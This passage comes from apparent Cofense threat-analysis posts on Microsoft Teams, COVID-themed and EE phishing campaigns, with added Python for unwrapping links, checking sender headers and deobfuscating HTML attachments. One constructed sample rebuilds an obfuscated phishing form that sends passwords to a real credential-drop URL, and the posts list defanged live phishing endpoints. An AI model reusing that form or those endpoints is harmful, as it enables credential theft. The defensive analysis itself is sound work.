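            nxt = "http://" + nxt   # wrapper dropped the scheme
        hops.append(nxt)
    return hops


def landing_host(url):
    """Hostname of the page the user would actually land on."""
    return (urlsplit(unwrap_url(url)[-1]).hostname or "").lower()


def embedded_emails(url):
    """Recipient addresses carried in any hop; kits use them to prefill the
    fake login form and to confirm the address is live."""
    found = []
    for hop in unwrap_url(url):
        for addr in EMAIL_RE.findall(unquote(hop)):
            if addr not in found:
                found.append(addr)
    return found


def defang(url):
    """Render a URL safe to paste into a report (hxxp, [.] and [@])."""
    url = re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)
    return url.replace(".", "[.]").replace("@", "[@]")


def triage(url):
    """One-shot summary for a reported hover link."""
    hops = unwrap_url(url)
    return {
        "hops": len(hops),
        "landing_host": landing_host(url),
        "emails": embedded_emails(url),
        "report_url": defang(hops[-1]),
    }


# Constructed samples (not captured traffic): a Safe Links-wrapped
# mailing-list archive link, and a click-tracker redirect that carries the
# recipient address, mirroring the link shapes described on this page.
SAFELINKS_SAMPLE = (
    "https://nam01.safelinks.protection.outlook.com/?url="
    "https%3A%2F%2Fus19.campaign-archive.com%2F%3Fu%3D0dce22c9638fc90b5c17ea20a"
    "%26id%3D6652f42d20&data=02%7C01%7C&sdata=x&reserved=0"
)
SMORE_SAMPLE = (
    "https://r.smore.com/c?u=pastell.in/ca07-b36n5-65m-c53b-o26v-62h-e79-t56e-c44"
    "?e5=victim@company.com"
)

if __name__ == "__main__":
    for sample in (SAFELINKS_SAMPLE, SMORE_SAMPLE):
        print(triage(sample))
```

The check that matters is the one in `unwrap_url`: a redirect parameter is followed only on a known wrapper host or when its value is an absolute URL, so the `u=` identifier on the mailing-list archive page is correctly treated as the end of the chain rather than as another hop.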

Figure 3: Initial Phishing Page

The phishing page above, where users are forwarded, follows Microsoft’s design (an almost picture-perfect replica); of course, the forged URL in the address bar gives it away. Once ‘Open Microsoft Teams’ has been clicked, a genuine notification would open the Microsoft Teams application. Instead, the user is taken on a detour to the final link of this phishing attack:

hXXps://imunodar[.]com/wp-content/plugins/wp-picaso/Teams/

Figure 4: Secondary Phishing Page

Once credentials have been supplied, the campaign redirects the user to the authentic ‘office[.]com’ webpage, which could be enough to assure users it was a genuine procedure. Assuming they logged in with their true Microsoft credentials, the user’s account and the personal data behind it are now in the hands of the threat actor.

Indicators of Compromise:

Network IOC IP
hXXps://us19[.]campaign-archive[.]com/?u=0dce22c9638fc90b5c17ea20a&id=6652f42d20
hXXps://imunodar[.]com/wp-content/plugins/wp-picaso/Teams/
104[.]118[.]190[.]227

 

How Cofense Can Help

Visit Cofense’s Remote Work Phishing Infocenter to stay up to date as threats evolve. Our site is updated with screenshots of real phish that have evaded secure email gateway detection and other helpful resources so you can help keep your organization protected.

 

Staff Members’ Inbox Positive for Coronavirus Themed Phish

By Ashley Tran, Cofense Phishing Defense Center

From prime ministers and members of congress to celebrities and staff of nursing homes, many have been affected by COVID-19. And the worst part? Threat actors know this and are heavily weaponizing the pandemic, exploiting the fears and concerns of users everywhere. The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign, found in environments protected by Microsoft and Symantec, that not only impersonates a company’s management but also claims that a fellow employee has tested positive for the disease, urging users to open a malicious attachment posing as “guidelines” or “next steps.”

As we have seen before and noted in previous Cofense blogs and media stories, Coronavirus themed phishing attacks are running rampant and attacking users across all industries. Although the attacks vary in method, the main takeaway is the same: all users must exercise the utmost caution and restraint in the face of emotionally jarring emails.

Figures 1-3: Email Bodies

The PDC has found multiple instances of this attack and a common pattern among them. As demonstrated in Figures 1-3, the email subject lines are nearly identical: “Staff Member Confirmed COVID 19 Positive ID,” followed by a random string of numbers and that day’s date. The emotions these subject lines evoke in users are also the same: fear and curiosity. Emails appearing to be a “Team Update on COVID 19” and bearing the company’s name can convince end users that the email was sent internally. However, the true senders are revealed via the return paths:

Maga[@]tus[.]tusdns[.]com and ungrez[@]ssd7[@]linuxpl[.]com

Admittedly these emails would appear suspicious to most, but the threat actor is relying on the emotional subject line to overcome logic and push users to read just the first line of the sender information and nothing more.
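Both sender tricks on this page can be checked mechanically from the headers of a reported message: the Return-Path on a domain unrelated to the From address in this campaign, and brand or role words stuffed into the display name or local part of an address on an unrelated domain, as in the fake Teams notification described earlier on this page. The Python below is an added example, not Cofense code. The raw headers are constructed for the example (the display names in particular are assumptions), and the brand allow list is a placeholder to be replaced with your own.

```python
# Added example (not Cofense code): two header checks for the sender tricks
# described on this page - an envelope sender (Return-Path) on a different
# domain from the From address, as in the "Management" COVID-19 mails, and
# brand or role words planted in the display name or local part of an
# address on an unrelated domain, as in the fake Teams notification earlier
# on this page. The raw headers below are constructed for the example and
# BRAND_ALLOWED is an assumption: build it from your own allow list.
import re
from email import message_from_string
from email.utils import parseaddr

# Assumed allow list: registrable domains permitted to send for a brand word.
BRAND_ALLOWED = {
    "microsoft": ("microsoft.com",),
    "teams": ("microsoft.com",),
    "office": ("microsoft.com",),
}
# Role words this page shows being stuffed into local parts.
ROLE_WORDS = ("notification", "teamadmin", "security", "management")


def registrable_domain(addr):
    """Last two labels of the address's domain. A real deployment would use
    a public-suffix list so that e.g. co.uk domains compare correctly."""
    domain = addr.rpartition("@")[2].strip().lower()
    labels = domain.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else domain


def return_path_mismatch(raw_headers):
    """True when the Return-Path domain differs from the From domain.
    Bulk-mail providers legitimately do this too, so it is a signal to
    weigh with the others, not a verdict on its own."""
    msg = message_from_string(raw_headers)
    from_addr = parseaddr(msg.get("From", ""))[1]
    rp_addr = parseaddr(msg.get("Return-Path", ""))[1]
    if not from_addr or not rp_addr:
        return False
    return registrable_domain(from_addr) != registrable_domain(rp_addr)


def brand_keyword_findings(raw_headers):
    """Brand words in the display name or local part whose domain is not
    on the allow list, plus role words planted in the local part."""
    msg = message_from_string(raw_headers)
    name, addr = parseaddr(msg.get("From", ""))
    local = addr.rpartition("@")[0].lower()
    dom = registrable_domain(addr)
    haystack = (name + " " + local).lower()
    findings = []
    for brand, allowed in BRAND_ALLOWED.items():
        if brand in haystack and dom not in allowed:
            findings.append("brand '%s' on unrelated domain %s" % (brand, dom))
    for word in ROLE_WORDS:
        if word in local:
            findings.append("role word '%s' in local part" % word)
    return findings


def sender_signals(raw_headers):
    """All sender-related signals for a reported message, as strings."""
    signals = brand_keyword_findings(raw_headers)
    if return_path_mismatch(raw_headers):
        msg = message_from_string(raw_headers)
        signals.append("return-path domain %s differs from From domain %s" % (
            registrable_domain(parseaddr(msg.get("Return-Path", ""))[1]),
            registrable_domain(parseaddr(msg.get("From", ""))[1])))
    return signals


# Constructed headers modelled on the two campaigns (display names and the
# subject's numeric suffix are assumed, not copied from real mail).
COVID_HEADERS = """\
From: "Company Management" <management@company.com>
Return-Path: <Maga@tus.tusdns.com>
Subject: Staff Member Confirmed COVID 19 Positive ID 4471 04/10/2020

"""
TEAMS_HEADERS = """\
From: "Microsoft Teams" <matcnotification.teamadmin_audidsenderderweeu44we7yhw@ssiconstructionnw.com>
Return-Path: <matcnotification.teamadmin_audidsenderderweeu44we7yhw@ssiconstructionnw.com>
Subject: Chat Message in Teams

"""

if __name__ == "__main__":
    for label, hdrs in (("covid", COVID_HEADERS), ("teams", TEAMS_HEADERS)):
        print(label, sender_signals(hdrs))
```

Note that the Teams message produces no Return-Path mismatch at all, which is consistent with it passing SPF and DKIM; the signal there comes entirely from the brand and role words on a domain that has nothing to do with Microsoft. Treat the output as triage hints for an analyst, not as an automatic block rule.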

The bodies of the emails vary more and are worded differently, but they share the same main point: a fellow employee has the virus, so read the attached guideline for more details or at least to learn the “next steps” to take. To top it off, the email is signed by “Management.”

The real payload of this attack is the HTML file attached to the email.

Figure 4 shows that the attachment is detected as malicious by a multitude of services; users, however, won’t see this when they read the email.

Figure 4: VirusTotal Analysis

Figure 5: Phishing Page

Upon opening the attachment users are presented with a generic Microsoft login page, a frequently targeted brand. The difference with this phish, however, is the threat actor has superimposed the login box over a blurred document that may appear to users as the previously mentioned “guidelines” lending an even greater sense of legitimacy.

The recipient’s email address is automatically filled into the username field by code in the HTML. The threat actor has gone to the trouble of embedding a base64-encoded copy of each recipient’s email address, which is decoded back to readable form when the victim interacts with the phish. This snippet of code can be seen in Figure 6.

Figure 6: Email Bodies

Once a user navigates to the next page and inputs their password, the information is then sent to the compromised site:

hxxp://tokai-lm[.]jp/style/89887cc/5789n[.]php?98709087-87634423

This exchange can be observed by opening the developer tools in any browser and watching the Network tab while the form is submitted, as shown in Figure 7.

Figure 7: Phishing Page

The code within the HTML file that hosts the phishing content uses typical malicious tactics. As seen in Figure 8, it does not look like ordinary HTML: the threat actor has obfuscated it to make analysis, as well as detection, harder. This is nothing new for phishing campaigns that use an HTML attachment, and de-obfuscating the code to reveal its methods is not difficult.

Figure 8: Obfuscated Code

To begin, the code is notably broken into several parts. Anyone with an eye for encoding will recognise them as hex-escaped text and base64. Both are easily decoded back into their original form, the true HTML, with tools such as RapidTables and Base64 Decode.
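Rather than pasting each chunk into an online decoder, the same two encodings can be peeled programmatically, which also makes the base64-embedded recipient address from the earlier paragraph fall out automatically. The Python below is an added example, not Cofense code or the kit’s own logic: it repeatedly replaces `unescape(...)`, `decodeURIComponent(...)` and `atob(...)` calls with their plaintext until nothing decodes, then extracts the form action (where credentials are posted), the prefilled address and every external resource. The sample attachment is constructed by encoding known-good HTML the same way a kit does; only the URLs in it are taken from this page’s own indicators.

```python
# Added example (not Cofense code): a small decoder for HTML attachments
# built the way this page describes, with the real page split into hex-
# escaped (unescape) and base64 (atob) chunks and the recipient address
# embedded as base64. It peels the layers, then pulls out the form action
# (the credential drop), the prefilled address and any external resources
# (style sheets, images) worth adding to the IOC list. The attachment below
# is constructed by encoding known-good HTML the same way; only the URLs are
# taken from this page's own indicators.
import base64
import re
from urllib.parse import unquote

# A decoding call with a purely encoded argument (hex escapes or base64).
# Restricting the argument charset stops the pattern from matching across
# the quotes of HTML that has already been decoded into the text.
CALL_RE = re.compile(
    r"\b(unescape|decodeURIComponent|atob)\(\s*(['\"])([A-Za-z0-9+/=%]+)\2\s*\)")
FORM_ACTION_RE = re.compile(r"<form\b[^>]*?\baction\s*=\s*['\"]?([^'\"\s>]+)", re.I)
RESOURCE_RE = re.compile(r"\b(?:href|src)\s*=\s*['\"]?(https?://[^'\"\s>]+)", re.I)
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def _decode_arg(func, arg):
    if func == "atob":
        padded = arg + "=" * (-len(arg) % 4)
        return base64.b64decode(padded).decode("utf-8", "replace")
    return unquote(arg)   # %XX escapes, what JS unescape does for ASCII


def decode_layer(text):
    """Replace every decodable call with its plaintext; return (text, count)."""
    count = 0

    def repl(m):
        nonlocal count
        count += 1
        return _decode_arg(m.group(1), m.group(3))

    return CALL_RE.sub(repl, text), count


def deobfuscate(text, max_layers=8):
    """Peel nested layers until nothing decodes; return (text, layers)."""
    layers = 0
    for _ in range(max_layers):
        text, count = decode_layer(text)
        if count == 0:
            break
        layers += 1
    return text, layers


def extract_indicators(attachment_html):
    text, layers = deobfuscate(attachment_html)
    action = FORM_ACTION_RE.search(text)
    emails = EMAIL_RE.findall(text)
    return {
        "layers": layers,
        "form_action": action.group(1) if action else None,
        "prefilled_email": emails[0] if emails else None,
        "external_resources": RESOURCE_RE.findall(text),
    }


# --- constructed sample attachment ----------------------------------------
def _hex(s):
    return "".join("%%%02X" % b for b in s.encode())


def _b64(s):
    return base64.b64encode(s.encode()).decode()


_TRUE_FORM = (
    '<form method="post" action="http://tokai-lm.jp/style/89887cc/5789n.php?98709087-87634423">'
    '<input id="user" name="login" type="text"><input name="passwd" type="password"></form>'
    "<script>document.getElementById('user').value=atob('" + _b64("victim@company.com") + "');</script>"
)
_TRUE_TAIL = (
    '<link rel="stylesheet" href="http://ibuykenya.com/vendor/doctrine/styles.css">'
    '<img src="https://i.ibb.co/dMcjCWC/image.png">'
)
SAMPLE_ATTACHMENT = (
    "<html><body><script>"
    "document.write(unescape('" + _hex(_TRUE_FORM) + "'));"
    "document.write(atob('" + _b64(_TRUE_TAIL) + "'));"
    "</script></body></html>"
)

if __name__ == "__main__":
    print(extract_indicators(SAMPLE_ATTACHMENT))
```

The decoded text is meant for reading and indicator extraction, not for execution: the decoding calls are replaced by their raw content, so the surrounding JavaScript is no longer syntactically valid, which is exactly the point when the file came out of a phishing attachment. Two layers are needed for the sample because the base64 recipient address only becomes visible after the hex layer around it has been removed.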

Figure 9: De-obfuscated Code

After de-obfuscation, the true HTML (Figure 9) reveals that the threat actor has compromised, or at the very least makes use of, a compromised site to host the style sheet for the phish:

hxxp://ibuykenya[.]com/vendor/doctrine/styles[.]css

Figure 10: Open Directory with Phish Resource Files

Figure 10 shows the open directory the threat actor uses to store the style sheet, along with what appear to be two additional files belonging to the phish, judging by their last-modified dates.

The image seen in the background of the document can also be recovered from the code. It is hosted on ImgBB, yet another relatively benign image hosting site that threat actors flock to for hosting the images used in their attacks.

hxxps://i[.]ibb[.]co/dMcjCWC/image[.]png

Figure 11: Document Preview from Phish

Upon closer observation, the title of the document can be read from the image. With a quick search, the image the threat actor used to further legitimize this login page in the eyes of the user can be traced back to the legitimate document shown in Figure 12.

Figure 12: Legitimate Document Utilized by Threat Actor

All these steps, the social engineering, the obfuscated code, the use of official COVID health advisories and more, are designed to ensure users don’t notice that a phishing attack is in progress. This phish also demonstrates the attacker’s need to layer techniques that avoid detection by email gateways, as well as the incident responder’s need for the right investigative tools to properly analyze, detect and quarantine this threat.

Network IOC  IP
hxxp://tokai-lm[.]jp/style/89887cc/5789n[.]php?98709087-87634423 150[.]60[.]156[.]116

 

How Cofense Can Help

Visit Cofense’s Coronavirus Phishing Infocenter to stay up to date as threats evolve. Our site is updated with screenshots and YARA rules as we continue to track campaigns.


Targeted Attack Uses Fake EE Email to Deceive Users

By Kian Mahdavi and Tej Tulachan, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has discovered a spear-phishing campaign designed to steal corporate executives’ payment details by spoofing EE, a well-known UK-based telecommunications and internet service provider. These spear-phishing messages were reported to the Cofense PDC by end users whose email environments are protected by Microsoft 365 EOP and Symantec. This new, targeted campaign shows that while exploiting well-known telecommunications brands is nothing new, such phishing emails continue to go undetected by popular email gateways designed to protect end users, leading to possible theft of prized corporate credentials and payment data.

Figure 1: Email Body

Threat actors sent a targeted email to a few executives, including one at a leading financial firm, with the subject line ‘View Bill – Error’, from a purchased domain (moniquemoll[.]nl). These details alone may raise red flags for eagle-eyed recipients, as EE’s trademarked name does not appear anywhere in the full email address.

The malicious URL inserted within the text is:

hXXps://fly-guyz[.]com/ee[.]co[.]uk[.]edcnymdsqmnydqnyo

The vague email says ‘we’re working to get this fixed’ but at no point indicates what the error is. Further on, the second hyperlink states ‘view billing to make sure your account details are correct’ to entice the recipient to click the phishing link.

The threat actor also fails to include EE’s correct registered office address, visible towards the bottom of the email. Once the social engineering does the trick and the user clicks one of the links, they are redirected to a phishing page.

Figure 2 shows the HTTPS padlock in the address bar of the phishing page. This gives users false confidence: TLS does encrypt the traffic between the browser and the site, but it says nothing about who operates the site. Here it simply protects the connection to the fraudster’s own server.

The threat actor went to the trouble of obtaining a TLS certificate for the domain precisely to gain that trust. Since certificates are now issued free of charge and automatically, this costs a fraudster nothing, and the padlock should never be read as a sign that a site is genuine.

Figures 2 and 3: First and second phishing pages

The peculiar aspect is the message the threat actor included, ‘You will not be charged’, to reassure recipients and trick them into providing their payment information. The user is then automatically redirected to the legitimate EE website, as displayed in Figure 4, to avoid suspicion. This is a common tactic to make the user believe the session timed out or their password was mistyped.

Figure 4: Legitimate Redirect Login Page

At the time of writing, the phishing page is still live. To validate the analysis, we entered fake credentials and captured the resulting requests, which confirmed the redirects to the fraudster’s collection endpoint at hXXps://kbimperial[.]com/data[.]php.

Figure 5: TCP Retransmission Packets

Indicators of Compromise:

Network IOC IP
hXXps://fly-guyz[.]com/ee[.]co[.]uk[.]edcnymdsqmnydqnyo/
hXXps://kbimperial[.]com/ee[.]co[.]uk[.]edcnymdsqmnydqnyo/logins
hXXps://kbimperial[.]com/data[.]php?
104[.]31[.]82[.]7
104[.]31[.]83[.]7
35[.]208[.]71[.]62

 

Discover how cybersecurity awareness training can help your organization defend against changing phishing threats.

 
